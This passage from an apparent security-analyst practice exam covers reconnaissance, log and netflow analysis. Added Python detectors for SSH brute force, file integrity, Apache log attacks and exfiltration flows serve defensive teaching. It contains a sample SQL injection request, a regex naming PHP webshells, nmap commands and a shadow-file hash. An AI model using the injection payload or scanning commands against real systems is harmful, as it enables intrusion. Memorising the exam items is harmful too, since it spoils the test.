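# Constructed sample: the burst from the question, a benign single failure, and a
# later success for the same account and source.
SAMPLE_AUTH_LOG = """\
Aug  6 14:12:10 demo sshd[5200]: Failed password for alice from 10.11.34.50 port 50122 ssh2
Aug  6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 port 38460 ssh2
Aug  6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 port 38452 ssh2
Aug  6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 port 38474 ssh2
Aug  6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 port 38446 ssh2
Aug  6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 port 38454 ssh2
Aug  6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 port 38448 ssh2
Aug  6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 port 38444 ssh2
Aug  6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 port 38463 ssh2
Aug  6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 port 38478 ssh2
Aug  6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 port 38476 ssh2
Aug  6 14:13:05 demo sshd[5310]: Accepted password for root from 10.11.34.11 port 38490 ssh2
"""

AUTH_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2"
)
WINDOW = timedelta(seconds=60)   # assumption: sliding window for counting failures
THRESHOLD = 5                    # assumption: failures per (source, user) that trigger an alert


def parse_auth_line(line, year=2017):
    """Return (timestamp, result, user, ip) or None for lines that are not sshd auth events."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    ts_text = " ".join(m["ts"].split())          # collapse the double space in "Aug  6"
    ts = datetime.strptime(f"{year} {ts_text}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, year=2017):
    """Alert once when a (source, user) pair crosses THRESHOLD failures inside WINDOW,
    and again if that pair later authenticates successfully."""
    failures = defaultdict(list)   # (ip, user) -> timestamps of recent failures
    alerts = []
    for line in lines:
        rec = parse_auth_line(line, year)
        if rec is None:
            continue
        ts, result, user, ip = rec
        key = (ip, user)
        if result == "Failed":
            recent = [t for t in failures[key] if ts - t <= WINDOW]
            recent.append(ts)
            failures[key] = recent
            if len(recent) == THRESHOLD:
                alerts.append(("bruteforce", ip, user, ts))
        elif len(failures[key]) >= THRESHOLD:
            # A success after a burst is the event that deserves an incident, not just a ticket.
            alerts.append(("success_after_bruteforce", ip, user, ts))
    return alerts
```

Note that the detector keys on the source address and account, so a distributed attack that spreads attempts over many sources (or a password spray that tries one password against many accounts) will slip under a per-pair threshold; those need a per-account or global counter as well.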
  90. As part of his reconnaissance effort, Charles uses the following Google search string:

    "authentication failure; logname=" ext:log;site:example.com
    

    What will he find if he receives results from his target’s domain?

    1. A list of successful logins
    2. A list of log names
    3. A list of failed logins
    4. A list of log files
  91. While reviewing email logs for his domain’s email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order. What is most likely occurring?

    1. Brute force
    2. Domain harvesting
    3. Domain probe
    4. Email list builder
  92. Which of the following capabilities is not a typical part of an SIEM system?

    1. Alerting
    2. Performance management
    3. Data aggregation
    4. Log retention
  93. What major issue would Charles face if he relied on hashing malware packages to identify malware packages?

    1. Hashing can be spoofed.
    2. Collisions can result in false positives.
    3. Hashing cannot identify unknown malware.
    4. Hashing relies on unencrypted malware samples.

    Use the following network diagram and scenario to answer the next three questions:

    Network diagram: the Internet (location A) connects to a device, which leads to location D and to two firewalls; the left firewall leads to the data center network (location B), and the right firewall leads to a device that fans out to three computers, one of which is labeled location C.

    Lauren is a security analyst who has been tasked with performing nmap scans of her organization’s network. She is a new hire and has been given this logical diagram of the organization’s network but has not been provided with any additional detail.

  94. Lauren wants to determine what IP addresses to scan from location A. How can she find this information?

    1. Scan the organization’s web server and then scan the other 255 IP addresses in its subnet.
    2. Query DNS to find her organization’s registered hosts.
    3. Contact ICANN to request the data.
    4. Use traceroute to identify the network that the organization’s domain resides in.
  95. If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans?

    1. The scans will match.
    2. Scans from location C will show no open ports.
    3. Scans from location C will show fewer open ports.
    4. Scans from location C will show more open ports.
  96. Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact?

    1. Location A
    2. Location B
    3. Location C
    4. Location D
  97. Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic?

    Flow diagram shows Internet leads to A - firewall and vice versa, A-firewall leads to B - router and vice versa, B - router leads to C - layer 3 distribution switch and vice versa, and C - layer 3 distribution switch leads to D - Windows 2012 server and vice versa.
    1. The firewall
    2. The router
    3. The distribution switch
    4. The Windows 2012 server
  98. Alex has been asked to investigate a call to one of his organization’s system administrators that is believed to have led to a breach. The administrator described that call by saying that the caller identified themselves as the assistant to the director of sales and said that they needed access to a file that was critical to a sales presentation with a major client but that their laptop had died. The administrator provided a link to the file, which included the organization’s sales data for the quarter. What type of social engineering occurred?

    1. Baiting
    2. Quid pro quo
    3. Pretexting
    4. Whaling
  99. Which of the three key objectives of cybersecurity is often ensured by using techniques like hashing and the use of tools like Tripwire?

    1. Confidentiality
    2. Integrity
    3. Identification
    4. Availability
  100. The netflow collector that Sam’s security team uses is capable of handling 1 gigabit of traffic per second. As Sam’s organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam’s team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data?

    1. Enable QoS
    2. Enable netflow compression
    3. Enable sampling
    4. None of the above
  101. Senior C-level executives at the organization that Alex works for have received targeted phishing messages that include a fake organizational login page link and a message that states that their passwords were inadvertently reset during a scheduled maintenance window. What type of attack should Alex describe in his after action report?

    1. Tuna phishing
    2. Whaling
    3. Spear phishing
    4. SAML phishing
  102. Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?

    1. AFRINIC
    2. APNIC
    3. RIPE
    4. LACNIC
  103. Chris wants to determine what TCP ports are listening on a Windows system. What is his best option to determine this from the command line?

    1. Use arp -a.
    2. Use netstat -lt.
    3. Use nmap -t 127.0.0.1.
    4. There is not a Windows command to do this.
  104. As part of her system hardening process for a Windows 10 workstation, Lauren runs the Microsoft Baseline Security Analyzer. She sees the following result after MBSA runs. What can she determine from this scan?

    Window shows Microsoft Baseline Security Analyzer where table shows columns for score, share, directory, share ACL (admin share), and directory ACL.
    1. The system has been compromised, and shares allow all users to read and execute administrative files.
    2. The system has default administrative shares enabled.
    3. The system is part of a domain that uses administrative shares to manage systems.
    4. The shares are properly secured and pose no threat to the system.
  105. While Greg was performing a port scan of a critical server system, the system administrators at his company observed the behavior shown here in their network management software suite. What action should Greg take after he is shown this chart?

    Bar graph shows AMI (AWS) on days from 21st April to 22nd April versus response time in milliseconds from 0 ms to 1500 ms versus percent packet loss from 0 percent to 100 percent with plots for average response time AMI (AWS), percentile 95 percent, et cetera.
    1. Increase the number of concurrent scans.
    2. Decrease the number of ports scanned.
    3. Decrease the number of concurrent scans.
    4. Increase the number of ports scanned.
  106. An access control system that relies on the operating system to constrain the ability of a subject to perform operations is an example of what type of access control system?

    1. A discretionary access control system
    2. A role-based access control system
    3. A mandatory access control system
    4. A level-based access control system
  107. While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP. What should Janet report has occurred?

    [ 21/Jul/2017:02:18:33 -0500] - - 10.0.1.1 "GET /scripts/sample.php" "-" 302 336 0
    [ 21/Jul/2017:02:18:35 -0500] - - 10.0.1.1 "GET /scripts/test.php" "-" 302 336 0
    [ 21/Jul/2017:02:18:37 -0500] - - 10.0.1.1 "GET /scripts/manage.php" "-" 302 336 0
    [ 21/Jul/2017:02:18:38 -0500] - - 10.0.1.1 "GET /scripts/download.php" "-" 302 336 0
    [ 21/Jul/2017:02:18:40 -0500] - - 10.0.1.1 "GET /scripts/update.php" "-" 302 336 0
    [ 21/Jul/2017:02:18:42 -0500] - - 10.0.1.1 "GET /scripts/new.php" "-" 302 336 0
    
    1. A denial-of-service attack
    2. A vulnerability scan
    3. A port scan
    4. A directory traversal attack
  108. Charles received a pcap file from a system administrator at a remote site who was concerned about the traffic it showed. What type of behavior should Charles report after his analysis of the file?

    Table shows columns for number, time, source (10.100.25.14), destination (10.100.18.12), protocol (TCP), length, and info.
    1. A DOS attack
    2. Port scanning
    3. A DDoS attack
    4. Service access issues
  109. Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?

    1. Submit cmd.exe to VirusTotal.
    2. Compare the hash of cmd.exe to a known good version.
    3. Check the file using the National Software Reference Library.
    4. Run cmd.exe to make sure its behavior is normal.
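Questions 99 and 109 both come down to the same control: hash a file and compare it with a trusted value, either a single known-good digest for one binary or a stored baseline for a whole tree, which is what Tripwire-style file integrity monitoring does. The following is an added example for this page, not code from the original text or from Tripwire; it builds a baseline of a constructed directory tree, tampers with it, and reports what changed. The directory layout and file contents are made up for the demonstration.

```python
import hashlib
import os
import tempfile


def file_digest(path, algo="sha256"):
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every file under root (relative, '/'-separated path) to its digest."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = file_digest(full)
    return baseline


def compare(baseline, current):
    """Integrity report: which known files changed, which appeared, which vanished."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def matches_known_good(path, known_good_hex, algo="sha256"):
    """The single-file check from question 109: one binary against a trusted digest."""
    return file_digest(path, algo) == known_good_hex.lower()


def _write(root, rel, data):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: baseline a tree, then replace cmd.exe, drop a DLL and delete a file."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "System32/cmd.exe", b"original cmd.exe bytes")
        _write(root, "System32/notepad.exe", b"notepad bytes")
        _write(root, "System32/drivers/etc/hosts", b"127.0.0.1 localhost\n")
        baseline = build_baseline(root)
        known_good_cmd = baseline["System32/cmd.exe"]

        _write(root, "System32/cmd.exe", b"trojanised cmd.exe bytes")   # replaced binary
        _write(root, "System32/evil.dll", b"dropped payload")            # new file
        os.remove(os.path.join(root, "System32", "notepad.exe"))         # removed file

        report = compare(baseline, build_baseline(root))
        report["cmd_matches_known_good"] = matches_known_good(
            os.path.join(root, "System32", "cmd.exe"), known_good_cmd)
        return report
```

The baseline itself has to live somewhere an attacker with write access to the monitored tree cannot reach (a separate host, a read-only mount, or a signed store), or the comparison is only as trustworthy as the box being checked.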
  110. What U.S. government program seeks to provide trusted sources that meet the following requirements?

    • Provide a chain of custody for classified and unclassified integrated circuits
    • Ensure that there will not be any reasonable threats related to supply disruption
    • Prevent intentional or unintentional modification or tampering of integrated circuits
    • Protect integrated circuits from reverse engineering and vulnerability testing
    1. Trusted Foundry
    2. Chain of Custody
    3. Trusted Suppliers
    4. Trusted Access Program
  111. While reviewing netflows for a system on her network, Alice discovers the following traffic pattern. What is occurring?

    Date flow start                 Duration Proto  Src IP Addr:Port->Dst IP Addr:Port Packets   Bytes   Flows
    2017-07-11        04:59:32.934  0.000   TCP    10.1.1.1:34543->10.2.2.6:22        1         60      1
    2017-07-11        04:59:39.730  0.000   TCP    10.1.1.1:34544->10.2.2.7:22        1         60      1
    2017-07-11        04:59:46.166  0.000   TCP    10.1.1.1:34545->10.2.2.8:22        1         60      1
    2017-07-11        04:59:52.934  0.000   TCP    10.1.1.1:34546->10.2.2.9:22        1         60      1
    2017-07-11        05:00:06.710  0.000   TCP    10.1.1.1:34547->10.2.2.10:22       1         60      1
    2017-07-11        05:00:46.160  0.000   TCP    10.1.1.1:34548->10.2.2.11:22       1         60      1
    2017-07-11        05:01:32.834  0.000   TCP    10.1.1.1:34549->10.2.2.12:22       1         60      1
    2017-07-11        05:01:39.430  0.000   TCP    10.1.1.1:34550->10.2.2.13:22       1         60      1
    2017-07-11        05:01:46.676  0.000   TCP    10.1.1.1:34551->10.2.2.14:22       1         60      1
    
    1. telnet scan
    2. ssh scan
    3. ssh scan with unsuccessful connection attempts
    4. sftp scan with unsuccessful connection attempts
  112. Chris wants to gather as much information as he can about an organization using DNS harvesting techniques. Which of the following methods will most easily provide the most useful information if they are all possible to conduct on the network he is targeting?

    1. DNS record enumeration
    2. Zone transfer
    3. Reverse lookup
    4. Domain brute forcing
  113. The national insurance company that Luke works for has experienced a breach, and Luke is attempting to categorize the impact. As he reviews the incident report, he notes that customer data that included Social Security numbers was exfiltrated from the organization. How should he categorize the impact?

    1. As a regulated information breach
    2. As an intellectual property breach
    3. As a confidential information breach
    4. As an integrity loss
  114. As part of his reconnaissance effort, Chris enters usernames from public information about a company into a site like checkusernames.com and receives information like the results shown here. What type of action is he performing?

    Window shows website of checkusernames.com which has search bar with text correctbatteryhorsestaple, button for check user name, and options for You Tube too long, Wikipedia available, TMZ not available, et cetera.
    1. Social engineering
    2. Brute-force username guessing
    3. Social media profiling
    4. Phishing
  115. Geoff wants to perform passive reconnaissance as part of an evaluation of his organization’s security controls. Which of the following techniques is a valid technique to perform as part of a passive DNS assessment?

    1. A DNS forward or reverse lookup
    2. A zone transfer
    3. A WHOIS query
    4. Using maltego
  116. Mike’s penetration test requires him to use passive mapping techniques to discover network topology. Which of the following tools is best suited to that task?

    1. Wireshark
    2. nmap
    3. netcat
    4. Angry IP Scanner
  117. Geoff has been asked to identify a technical solution that will reduce the risk of captured or stolen passwords being used to allow access to his organization’s systems. Which of the following technologies should he recommend?

    1. Captive portals
    2. Multifactor authentication
    3. VPNs
    4. OAuth
  118. While gathering DNS information about an organization, Chris discovered multiple AAAA records. What type of reconnaissance does this mean Chris may want to consider?

    1. Second-level DNS queries
    2. IPv6 scans
    3. Cross-domain resolution
    4. A CNAME verification
  119. Sharon wants to gather email addresses as part of her reconnaissance efforts. Which of the following tools best suits her needs?

    1. nmap
    2. cree.py
    3. MailSnarf
    4. TheHarvester

  120. After Charles completes a topology discovery scan of his local network, he sees the Zenmap topology shown here. What can Charles determine from the Zenmap topology view?

    Diagram shows circle with markings for router.demo.com (192.168.1.1), DemoHost2 (192.168.1.17), DemoPrinter (192.168.1.9), DemoHost4 (192.168.1.79), et cetera.
    1. There are five hosts with port security enabled.
    2. DemoHost2 is running a firewall.
    3. DemoHost4 is running a firewall.
    4. There are four hosts with vulnerabilities and seven hosts that do not have vulnerabilities.
  121. Which of the following items is not one of the three important rules that should be established before a penetration test?

    1. Timing
    2. Reporting
    3. Scope
    4. Authorization
  122. Scott is part of the white team who is overseeing his organization’s internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?

    Window shows table with columns for number, time, source, destination (10.0.2.15, 10.0.2.4), protocol (TCP, HTTP), length, and info.
    1. The blue team has succeeded.
    2. The red team is violating the rules of engagement.
    3. The red team has succeeded.
    4. The blue team is violating the rules of engagement.
  123. Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?

    1. LDAPS and HTTPS
    2. FTPS and HTTPS
    3. RDP and HTTPS
    4. HTTP and Secure DNS
  124. Lauren inputs the following command on a Linux system:

    #echo 127.0.0.1 example.com >> /etc/hosts
    

    What has she done?

    1. She has added the system to the allowed hosts file.
    2. She has routed traffic for the example.com domain to the local host.
    3. She has routed local host traffic to example.com.
    4. She has overwritten the hosts file and will have deleted all data except this entry.
  125. While reviewing Apache logs, Cynthia notices the following log entries. What has occurred?

    10.0.1.1 - POST /wordpress/wp-content/r57.php?1 200
    10.0.1.1 - GET /wordpress/wp-content/r57.php 200
    
    1. A file was downloaded and verified.
    2. A file was emailed.
    3. A file was moved to the wp-content directory.
    4. A file was uploaded and verified.
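Questions 84, 107 and 125 each show a single Apache access-log pattern that an analyst is expected to recognise: an injected UNION SELECT hidden behind URL encoding, a rapid burst of requests for scripts that do not exist from one source, and a POST to a well-known PHP webshell name followed by a GET that checks it landed. The block below is an added example for this page, not code from the original question set; it parses constructed combined-format lines modelled on those entries and flags all three behaviours. The SQL injection patterns, the list of webshell file names and the five-path scanning threshold are assumptions chosen for the sample.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample in Apache combined format (modelled on the questions, not copied verbatim).
SAMPLE_LOG = """\
10.1.1.1 - - [27/Jun/2017:11:42:22 -0500] "GET /query.php?searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0"
10.0.1.1 - - [21/Jul/2017:02:18:33 -0500] "GET /scripts/sample.php HTTP/1.1" 302 336 "-" "-"
10.0.1.1 - - [21/Jul/2017:02:18:35 -0500] "GET /scripts/test.php HTTP/1.1" 302 336 "-" "-"
10.0.1.1 - - [21/Jul/2017:02:18:37 -0500] "GET /scripts/manage.php HTTP/1.1" 302 336 "-" "-"
10.0.1.1 - - [21/Jul/2017:02:18:38 -0500] "GET /scripts/download.php HTTP/1.1" 302 336 "-" "-"
10.0.1.1 - - [21/Jul/2017:02:18:40 -0500] "GET /scripts/update.php HTTP/1.1" 302 336 "-" "-"
10.0.1.1 - - [21/Jul/2017:02:18:42 -0500] "POST /wordpress/wp-content/r57.php?1 HTTP/1.1" 200 512 "-" "-"
10.0.1.1 - - [21/Jul/2017:02:18:43 -0500] "GET /wordpress/wp-content/r57.php HTTP/1.1" 200 2048 "-" "-"
192.0.2.9 - - [21/Jul/2017:02:19:00 -0500] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)
# Assumed signatures: enough for the sample, far from a complete WAF ruleset.
SQLI_RE = re.compile(r"union\s+(?:all\s+)?select|\bor\s+\d+\s*=\s*\d+|sleep\s*\(|'\s*--", re.I)
WEBSHELL_RE = re.compile(r"/(?:r57|c99|wso|b374k)[^/]*\.php$", re.I)
PROBE_THRESHOLD = 5     # distinct paths from one source before it is called a scan (assumption)


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text):
    """Return (ip, kind, detail) findings for injection, webshell upload and scanning."""
    findings = []
    paths_by_ip = defaultdict(set)
    posted_shells = set()
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if e is None:
            continue
        target = unquote_plus(e["target"])      # decode %20 etc. before matching
        path = target.split("?", 1)[0]
        paths_by_ip[e["ip"]].add(path)
        if SQLI_RE.search(target):
            findings.append((e["ip"], "sqli", path))
        if WEBSHELL_RE.search(path):
            key = (e["ip"], path)
            if e["method"] == "POST":
                posted_shells.add(key)          # upload (or command) sent to a shell name
            elif e["method"] == "GET" and key in posted_shells and e["status"] == "200":
                findings.append((e["ip"], "webshell_upload_verified", path))
    for ip, paths in paths_by_ip.items():
        if len(paths) >= PROBE_THRESHOLD:
            findings.append((ip, "scan", len(paths)))
    return findings
```

Matching after URL decoding matters: the raw line in question 84 never contains the literal string "UNION SELECT", only "UNION%20SELECT", and a signature applied to the encoded request would miss it. The same decoding step is why double-encoded payloads (%2520) need a second pass in a production filter.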
  126. Rhonda has identified a privilege escalation flaw on the system she targeted in the first phase of her penetration test and is now ready to take the next step. According to the NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this diagram?

    Flow diagram shows gaining access leads to escalating privileges, which leads to C and install additional tools, where finally it leads to gaining access.
    1. System browsing
    2. Scanning
    3. Rooting
    4. Consolidation
  127. While conducting a penetration test, Ben executes the following command:

    ifconfig eth0 hw ether 08:00:27:06:d4
    

    What network protection is Ben most likely attempting to avoid?

    1. Port security
    2. NAC
    3. A firewall
    4. An IPS
  128. When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing?

    1. How fast the scan runs
    2. The TCP timeout flag it will set
    3. How many retries it will perform
    4. How long the scan will take to start up
  129. While conducting a port scan of a remote system, Henry discovers TCP port 1433 open. What service can he typically expect to run on this port?

    1. Oracle
    2. VNC
    3. IRC
    4. Microsoft SQL
  130. Every year, Alice downloads and reads a security industry published list of all the types of attacks, compromises, and malware events that have occurred, that are becoming more prevalent, and that are decreasing in occurrence. What type of analysis can she perform using this information?

    1. Anomaly
    2. Trend
    3. Heuristic
    4. Availability
  131. While application vulnerability scanning one of her target organization’s web servers, Andrea notices that the server’s hostname is resolving to a cloudflare.com host. What does Andrea know about her scan?

    1. It is being treated like a DDoS attack.
    2. It is scanning a CDN-hosted copy of the site.
    3. It will not return useful information.
    4. She cannot determine anything about the site based on this information.
  132. While conducting active reconnaissance, Lauren discovers a web remote management application that appears to allow Windows command-line access on a server. What command can she run to quickly determine what user the service is running as?

    1. username
    2. showuser
    3. whoami
    4. cd c:\Users\%currentuser
  133. While tracking a potential APT on her network, Cynthia discovers a network flow for her company’s central file server. What does this flow entry most likely show if 10.2.2.3 is not a system on her network?

    Date flow start                  Duration   Proto  Src IP Addr:Port->Dst IP Addr:Port   Packets    Bytes    Flows
    2017-07-11          13:06:46.343 21601804   TCP   10.1.1.1:1151->10.2.2.3:443       9473640    9.1 G    1
    2017-07-11          13:06:46.551 21601804   TCP   10.2.2.3:443->10.1.1.1:1151       8345101    514 M    1
    
    1. A web browsing session
    2. Data exfiltration
    3. Data infiltration
    4. A vulnerability scan
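Questions 111 and 133 are the two flow patterns an analyst most often pulls out of a collector: many single-packet flows from one source to the same destination port across a range of hosts (a scan that never completes a handshake), and a long-lived outbound flow whose byte count dwarfs the reply traffic (data leaving the network). The following is an added example for this page, not code from the original text or from nfdump; it parses constructed flow records laid out like the ones above and applies both checks. The internal address range (10.1.0.0/16, so that 10.2.2.3 counts as external as in question 133), the five-target scan threshold, and the 100 MB / 5:1 exfiltration thresholds are assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed records modelled on the two questions plus one ordinary browsing session.
SAMPLE_FLOWS = """\
Date flow start          Duration Proto  Src IP Addr:Port->Dst IP Addr:Port   Packets  Bytes  Flows
2017-07-11 04:59:32.934  0.000    TCP    10.1.1.1:34543->10.2.2.6:22         1        60     1
2017-07-11 04:59:39.730  0.000    TCP    10.1.1.1:34544->10.2.2.7:22         1        60     1
2017-07-11 04:59:46.166  0.000    TCP    10.1.1.1:34545->10.2.2.8:22         1        60     1
2017-07-11 04:59:52.934  0.000    TCP    10.1.1.1:34546->10.2.2.9:22         1        60     1
2017-07-11 05:00:06.710  0.000    TCP    10.1.1.1:34547->10.2.2.10:22        1        60     1
2017-07-11 05:00:46.160  0.000    TCP    10.1.1.1:34548->10.2.2.11:22        1        60     1
2017-07-11 05:01:32.834  0.000    TCP    10.1.1.1:34549->10.2.2.12:22        1        60     1
2017-07-11 05:01:39.430  0.000    TCP    10.1.1.1:34550->10.2.2.13:22        1        60     1
2017-07-11 05:01:46.676  0.000    TCP    10.1.1.1:34551->10.2.2.14:22        1        60     1
2017-07-11 13:06:46.343  21601804 TCP    10.1.1.1:1151->10.2.2.3:443         9473640  9.1 G  1
2017-07-11 13:06:46.551  21601804 TCP    10.2.2.3:443->10.1.1.1:1151         8345101  514 M  1
2017-07-11 13:10:02.118  12.400   TCP    10.1.1.5:51000->203.0.113.10:443    40       12 K   1
2017-07-11 13:10:02.120  12.400   TCP    203.0.113.10:443->10.1.1.5:51000    60       800 K  1
"""

FLOW_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}:\d{2}(?:\.\d+)?)\s+(?P<duration>[\d.]+)\s+"
    r"(?P<proto>[A-Z]+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<dst>[\d.]+):(?P<dport>\d+)\s+"
    r"(?P<packets>\d+)\s+(?P<bytes>[\d.]+(?:\s*[KMG])?)\s+(?P<flows>\d+)\s*$"
)
UNIT = {"": 1, "K": 1000, "M": 1000 ** 2, "G": 1000 ** 3}
INTERNAL = [ip_network("10.1.0.0/16")]   # assumption: the organisation's own address space


def parse_bytes(text):
    num, unit = re.match(r"([\d.]+)\s*([KMG]?)", text).groups()
    return int(round(float(num) * UNIT[unit]))


def parse_flow(line):
    m = FLOW_RE.match(line)
    if not m:
        return None                       # header line or anything else that is not a record
    f = m.groupdict()
    for k in ("sport", "dport", "packets", "flows"):
        f[k] = int(f[k])
    f["bytes"] = parse_bytes(f["bytes"])
    return f


def is_internal(addr):
    return any(ip_address(addr) in net for net in INTERNAL)


def detect_scan(flows, min_targets=5, max_packets=1):
    """One source, one destination port, many destination hosts, each flow a single packet."""
    targets = defaultdict(set)
    for f in flows:
        if f["packets"] <= max_packets:
            targets[(f["src"], f["dport"])].add(f["dst"])
    return [(src, port, len(hosts)) for (src, port), hosts in targets.items()
            if len(hosts) >= min_targets]


def detect_exfil(flows, min_bytes=100 * 1000 ** 2, min_ratio=5.0):
    """Large internal-to-external flows whose reply traffic is a small fraction of what was sent."""
    by_tuple = {(f["src"], f["sport"], f["dst"], f["dport"]): f for f in flows}
    hits = []
    for (src, sport, dst, dport), f in by_tuple.items():
        if not (is_internal(src) and not is_internal(dst) and f["bytes"] >= min_bytes):
            continue
        reverse = by_tuple.get((dst, dport, src, sport))
        inbound = reverse["bytes"] if reverse else 0
        if f["bytes"] >= min_ratio * max(inbound, 1):
            hits.append((src, dst, dport, f["bytes"], inbound))
    return hits
```

The ratio test is what separates the 9.1 GB upload in question 133 from an ordinary download of the same size: a browsing or update session has most of its bytes flowing inbound, while exfiltration inverts that, and the direction is visible in flow data even though the payload on port 443 is encrypted.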
  134. Chris wants to prevent users from running a popular game on Windows workstations he is responsible for. How can Chris accomplish this for Windows 10 Pro workstations?

    1. Using application whitelisting to prevent all unallowed programs from running
    2. Using Windows Defender and adding the game to the blacklist file
    3. By listing it in the Blocked Programs list via secpol.msc
    4. You cannot blacklist applications in Windows 10 without a third-party application.
  135. After a series of compromised accounts led to her domain being blacklisted, Lauren has been asked to restore her company’s email as quickly as possible. Which of the following options is not a valid way to allow her company to send email successfully?

    1. Migrate her company’s SMTP servers to new IP addresses.
    2. Migrate to a cloud email hosting provider.
    3. Change SMTP headers to prevent blacklisting.
    4. Work with the blacklisting organizations to get removed from the list.
  136. Part of Tracy’s penetration testing assignment is to evaluate the WPA2 Enterprise protected wireless networks of her target organization. What major differences exist between reconnaissance of a wired network versus a wireless network?

    1. Encryption and physical accessibility
    2. Network access control and encryption
    3. Port security and physical accessibility
    4. Authentication and encryption
  137. Ian’s company has an internal policy requiring that they perform regular port scans of all of their servers. Ian has been part of a recent effort to move his organization’s servers to an infrastructure as a service provider. What change will Ian most likely need to make to his scanning efforts?

    1. Change scanning software.
    2. Follow the service provider’s scan policies.
    3. Sign a security contract with the provider.
    4. Discontinue port scanning.
  138. During a regularly scheduled PCI compliance scan, Fred has discovered port 3389 open on one of the point-of-sale terminals that he is responsible for managing. What service should he expect to find enabled on the system?

    1. MySQL
    2. RDP
    3. TOR
    4. Jabber
  139. Cynthia knows that the organization she is scanning runs services on alternate ports to attempt to reduce scans of default ports. As part of her intelligence-gathering process, she discovers services running on ports 8080 and 8443. What services are most likely running on these ports?

    1. Botnet C&C
    2. Nginx
    3. Microsoft SQL Server instances
    4. Web servers
  140. Lauren wants to identify all the printers on the subnets she is scanning with nmap. Which of the following nmap commands will not provide her with a list of likely printers?

    1. nmap -sS -p 9100,515,631 10.0.10.15/22 -oX printers.txt
    2. nmap -O 10.0.10.15/22 -oG - | grep printer >> printers.txt
    3. nmap -sU -p 9100,515,631 10.0.10.15/22 -oX printers.txt
    4. nmap -sS -O 10.0.10.15/22 -oG | grep >> printers.txt
  141. Chris knows that systems have connected to a remote host on TCP ports 1433 and 1434. If he has no other data, what should his best guess be about what the host is?

    1. A print server
    2. A Microsoft SQL server
    3. A MySQL server
    4. A secure web server running on an alternate port
  142. What services will the following nmap scan test for?

    nmap -sV -p 22,25,53,389 192.168.2.50/27
    
    1. telnet, SMTP, DHCP, MS-SQL
    2. ssh, SMTP, DNS, LDAP
    3. telnet, SNMP, DNS, LDAP
    4. ssh, SNMP, DNS, RDP
  143. While investigating a compromise, Glenn encounters evidence that a user account has been added to the system he is reviewing. He runs a diff of /etc/shadow and /etc/passwd and sees the following output. What has occurred?

    > root:$6$XHxtN5iB$5WOyg3gGfzr9QHPLo.7z0XIQIzEW6Q3/K7iipxG7ue04CmelkjC51SndpOcQlxTHmW4/AKKsKew4f3cb/.BK8/:16828:0:99999:7:::
    > daemon:*:16820:0:99999:7:::
    > bin:*:16820:0:99999:7:::
    > sys:*:16820:0:99999:7:::
    > sync:*:16820:0:99999:7:::
    > games:*:16820:0:99999:7:::
    > man:*:16820:0:99999:7:::
    > lp:*:16820:0:99999:7:::
